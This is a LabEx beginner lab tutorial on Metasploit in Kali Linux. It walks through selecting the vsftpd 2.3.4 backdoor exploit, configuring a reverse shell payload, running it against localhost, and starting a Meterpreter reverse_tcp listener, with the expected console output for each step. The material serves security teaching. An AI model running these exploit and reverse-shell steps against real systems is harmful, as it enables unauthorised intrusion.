LabEx
Log InJoin For Free

Kali Exploitation with Metasploit

Kali LinuxKali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on leveraging the powerful Metasploit Framework to identify vulnerabilities, configure payloads, execute exploits, and interact with compromised systems through a Meterpreter session. Designed for beginners, this lab guides you step by step through essential cybersecurity techniques in a safe and structured manner. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.

Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL kali(("Kali")) -.-> kali/KaliGroup(["Kali"]) kali/KaliGroup -.-> kali/pkg_ops("Package Management") kali/KaliGroup -.-> kali/metasploit_ops("Metasploit Framework") kali/KaliGroup -.-> kali/bash_code("Bash Scripting") subgraph Lab Skills kali/pkg_ops -.-> lab-552293{{"Kali Exploitation with Metasploit"}} kali/metasploit_ops -.-> lab-552293{{"Kali Exploitation with Metasploit"}} kali/bash_code -.-> lab-552293{{"Kali Exploitation with Metasploit"}} end

Starting Metasploit Framework

In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.

When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.

Before using Metasploit, you need to ensure it is installed in the Kali Linux container. Let's update the package list and install the Metasploit Framework by typing the following commands in the terminal and pressing Enter after each one:

apt update
apt install -y metasploit-framework

These commands refresh the package list and install Metasploit if it is not already present. The installation may take a few minutes, so please wait for it to complete.

Once installed, start the Metasploit console by typing the following command and pressing Enter:

msfconsole

The first time you run this command, it might take a moment to initialize as it sets up the database and loads modules. Be patient during this process.

You will see an output similar to this when Metasploit starts:

Metasploit Framework
...
msf6 >

The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. The number (e.g., 6) represents the version of Metasploit.

This step familiarizes you with launching Metasploit, which is the foundation for all subsequent penetration testing activities in this lab. Do not exit the console, as you will use it in the next step to search for and select an exploit.

Searching and Selecting an Exploit

Now that you have started the Metasploit Framework, the next step is to search for and select an exploit to target a specific vulnerability. This process is crucial in penetration testing as it helps identify potential weaknesses in systems or applications.

An exploit is a piece of code or a technique that takes advantage of a vulnerability in a system to gain unauthorized access or perform malicious actions. Metasploit provides a vast database of exploits, making it easier to test vulnerabilities in a controlled environment like this lab.

Since you are already in the Metasploit console (with the msf6 > prompt), let's search for an exploit related to a common service like FTP, which is often vulnerable in older systems. Type the following command at the msf6 > prompt and press Enter:

search ftp

This command lists exploits and auxiliary modules related to FTP. The output will look something like this, though the exact list may vary:

Matching Modules
================

   ##  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor          2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                              normal     No     FTP Version Scanner
   2  auxiliary/scanner/ftp/anonymous                                normal     No     FTP Anonymous Access Scanner
...

In this output, you can see various exploits. For this lab, focus on the vsftpd_234_backdoor exploit, which targets a specific vulnerability in VSFTPD version 2.3.4.

To select this exploit, type the following command and press Enter:

use exploit/unix/ftp/vsftpd_234_backdoor

If successful, the prompt will change to something like:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

This indicates that you have selected the exploit. At this point, you are not running the exploit; you are only preparing it for the next steps.

To confirm the selection, type the following command and press Enter:

info

This displays detailed information about the selected exploit. Look for the line that says Name: VSFTPD v2.3.4 Backdoor Command Execution to verify you have the correct exploit. The output starts like this:

Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
...

You have now successfully searched for and selected an exploit in Metasploit. This step builds the foundation for configuring a payload in the next step, so do not exit the console as you will continue working from here.

Configuring a Reverse Shell Payload

With the exploit selected, the next step is to configure a reverse shell payload. This payload will define what happens after the vulnerability is exploited, allowing you to gain access to the target system in a controlled manner.

A payload in penetration testing is the component of an exploit that determines the action taken after successful exploitation. A reverse shell is a type of payload where the target system connects back to your machine, giving you a command-line interface to interact with it. This differs from a bind shell, where you connect to the target.

Since you are still in the Metasploit console with the vsftpd_234_backdoor exploit selected (prompt should be msf6 exploit(unix/ftp/vsftpd_234_backdoor) >), let's set up the payload. Type the following command to set a reverse shell payload and press Enter:

set payload cmd/unix/reverse

You will see a confirmation like:

payload => cmd/unix/reverse

Next, configure the reverse shell options. You need to specify the IP address and port on your machine where the target will connect back. In this lab, since both the attacker and target simulation are on the same Kali Linux container, use 127.0.0.1 (localhost) as the IP address. Type the following command and press Enter:

set LHOST 127.0.0.1

The output will confirm:

LHOST => 127.0.0.1

Now, set the port to 4444, a common choice for reverse shells. Type the following command and press Enter:

set LPORT 4444

The output will confirm:

LPORT => 4444

To ensure everything is set correctly, type the following command and press Enter:

show options

This displays a table of options for both the exploit and payload. Look for the Payload options section, which should show:

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

If the values for LHOST and LPORT are not as shown, repeat the set commands to correct them.

This step prepares the payload for the exploit, ensuring that if the exploit succeeds, you can establish a connection back to your machine. Do not exit the Metasploit console, as you will use these settings to run the exploit in the next step.

Running the Exploit

Having configured the exploit and payload, you are now ready to run the exploit using the Metasploit Framework. This step demonstrates how to execute an exploit to attempt gaining access to a vulnerable system.

Running an exploit means instructing Metasploit to use the selected exploit and payload against a target. In a real scenario, you would specify the IP address of a vulnerable machine. However, in this lab environment, since there is no real target, you will simulate the process by targeting localhost (127.0.0.1), focusing on understanding the mechanics of execution.

You should still be in the Metasploit console with the vsftpd_234_backdoor exploit selected. First, set the target IP address (remote host or RHOST) to 127.0.0.1 for simulation purposes. Type the following command and press Enter:

set RHOST 127.0.0.1

The output will confirm:

RHOST => 127.0.0.1

Now, execute the exploit by typing the following command and pressing Enter:

exploit

Metasploit will attempt to run the exploit against the specified target. Since there is no vulnerable VSFTPD service running on localhost in this lab environment, the exploit will fail, which is expected. The output might look like this:

[*] Started reverse TCP handler on 127.0.0.1:4444
[*] 127.0.0.1:21 - Trying to connect and authenticate...
[-] 127.0.0.1:21 - Failed to connect - Connection refused (ECONNREFUSED)
[*] Exploit completed, but no session was created.

This output shows that Metasploit started a listener on port 4444 for the reverse shell, attempted to connect to the target on port 21 (default FTP port), but failed because no service is running there. This is normal for our simulated setup, as the goal is to learn the process, not to compromise a real system.

Even though the exploit did not succeed, notice that Metasploit started a reverse TCP handler. In a real scenario with a vulnerable target, if the exploit works, the target would connect back to this port, and you would gain a shell session. For now, no session is created, which is expected.

This step teaches you the process of running an exploit in Metasploit. Keep the console open, as you will move to setting up a Meterpreter payload in the next step.

Setting Up a Meterpreter Payload and Listener

In this step, you will learn how to set up a Meterpreter payload and start a listener to simulate accessing a session on a compromised system. Since this is a simulated lab environment without a real target, no actual session will be created, but you will understand the process of preparing for post-exploitation tasks.

Meterpreter is an advanced payload in Metasploit that provides a powerful interactive shell for post-exploitation activities like file system navigation and process management. Unlike a basic reverse shell, Meterpreter offers more features for controlling a compromised system. A session in Metasploit is an active connection between you and the target, allowing command execution.

Since the previous exploit did not result in a session, you will use a standalone handler to set up a Meterpreter listener. If you are still in the Metasploit console, type the following command to switch to the multi/handler module and press Enter:

use exploit/multi/handler

The prompt should change to:

msf6 exploit(multi/handler) >

Now, configure the handler to use a Meterpreter payload for Linux systems. Type the following command and press Enter:

set payload linux/x86/meterpreter/reverse_tcp

The output will confirm:

payload => linux/x86/meterpreter/reverse_tcp

Next, set the listener options. Use 127.0.0.1 as the IP address (LHOST) since this is a simulation on the same machine. Type the following command and press Enter:

set LHOST 127.0.0.1

The output will confirm:

LHOST => 127.0.0.1

Set the port (LPORT) to 4444. Type the following command and press Enter:

set LPORT 4444

The output will confirm:

LPORT => 4444

Verify the settings by typing the following command and pressing Enter:

show options

Look for the Payload options section, which should show:

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

If the values are incorrect, repeat the set commands to fix them.

Finally, start the listener by typing the following command and pressing Enter:

exploit

Metasploit will start listening on the specified IP and port. Since there is no real target connecting back, no session will be created. The output will look like this:

[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the payload handler...

The console will remain active, waiting for a connection. In a real scenario, if a target connects with the Meterpreter payload, a session would be established, and you would see a message like Meterpreter session 1 opened. For now, stop the listener by pressing Ctrl + C to interrupt the process.

This step helps you understand how to prepare a Meterpreter payload and listener, a critical skill for post-exploitation in penetration testing. You can now exit the Metasploit console if desired by typing exit and pressing Enter.

Summary

In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework within a controlled environment on the LabEx VM. You started by launching Metasploit, searched for and selected an exploit, configured a reverse shell payload, executed the exploit, and set up a Meterpreter payload with a listener for post-exploitation simulation. These steps provided a practical introduction to identifying vulnerabilities, preparing payloads, and understanding the exploitation process. By following this structured approach in the Kali Linux container's shell, you gained hands-on experience with essential cybersecurity tools and techniques.

Related Kali Linux Courses
Kali Server Exploitation in Action

Kali Server Exploitation in Action

CybersecurityPen Testing
Beginner